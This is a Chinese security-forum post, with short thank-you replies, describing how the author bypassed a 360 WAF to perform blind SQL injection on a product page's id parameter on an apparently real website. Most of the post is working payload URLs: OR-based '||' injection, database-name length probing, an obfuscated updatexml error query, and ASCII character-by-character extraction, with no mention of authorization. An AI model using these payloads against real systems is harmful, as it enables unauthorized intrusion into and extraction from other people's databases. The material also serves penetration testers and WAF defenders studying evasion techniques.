[原创]SQL注入下双WAF绕过-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]SQL注入下双WAF绕过

发表于: 2023-9-19 09:19 1917

[原创]SQL注入下双WAF绕过

Locks_

2023-9-19 09:19

1917

利用HPP漏洞参数污染
正常页面情况下

1	`http://4f0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=79`

图片描述
被360waf拦截

1	`http://e8cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=79'`

图片描述
进行隔断绕过

1	`http://684K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=79%20\|\|%201=1`

图片描述

关键字等价绕过
原因是使用&&进行连接时不需要进行闭合，流程为 id=1 然后继续执行 id=2 最后--+单行注释

进一步构造payload

1	`http://5ecK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20length(database())>1`

图片描述

判断数据库名长度判断

1	`http://559K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20length(database())>10`

图片描述

二分发进行发现是6

1	`http://c77K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20length(database())=6`

图片描述

更近一步，就蹭蹭绝对不进去
这里失败了a-z都不行

1	`http://866K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20left((select%20database()),1)=a`

被waf拦截了

1	`http://b7aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)`

图片描述

使用ascii进行爆库

1	`http://d06K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20and%20(ascii(substr(database(),1,1))%20=109)`

![[b891d28360cb0a22a713dcc78e16047.png]]
这里猜测应该是and问题，给他去掉

1	`http://32aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20(ascii(substr(database(),1,1))=109)`

图片描述
ascii判断出第一位是108

1	`http://d1bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5k6h3y4F1/productshow.php?id=-79%20\|\|%20(ascii(substr(database(),1,1))=108)`

![[Pasted image 20230304142131.png]]
所以对应的ascii表，这个第一个字符就是m了

剩下的不必多说
总结：
关键字等价绕过
ascii判断，and不行直接丢掉

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・7

免费・4

支持

最新回复 (4)
秋狝雪币： 5621 活跃值： (31896) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1569 粉丝 38 关注私信	秋狝 2 楼感谢分享 2023-9-20 10:37 1
goldli 雪币： 2132 活跃值： (1866) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 90 粉丝 1 关注私信	goldli 3 楼非常直观的SQL注入用例 2023-11-16 08:16 0
涮火锅的叔雪币： 218 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	涮火锅的叔 4 楼感谢分享 2024-2-17 22:19 0
陈小贝雪币： 227 活跃值： (303) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	陈小贝 5 楼感谢分享简单明了 2024-2-18 14:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Locks_

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (4)
秋狝雪币： 5621 活跃值： (31896) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1569 粉丝 38 关注私信	秋狝 2 楼感谢分享 2023-9-20 10:37 1
goldli 雪币： 2132 活跃值： (1866) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 90 粉丝 1 关注私信	goldli 3 楼非常直观的SQL注入用例 2023-11-16 08:16 0
涮火锅的叔雪币： 218 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	涮火锅的叔 4 楼感谢分享 2024-2-17 22:19 0
陈小贝雪币： 227 活跃值： (303) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	陈小贝 5 楼感谢分享简单明了 2024-2-18 14:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复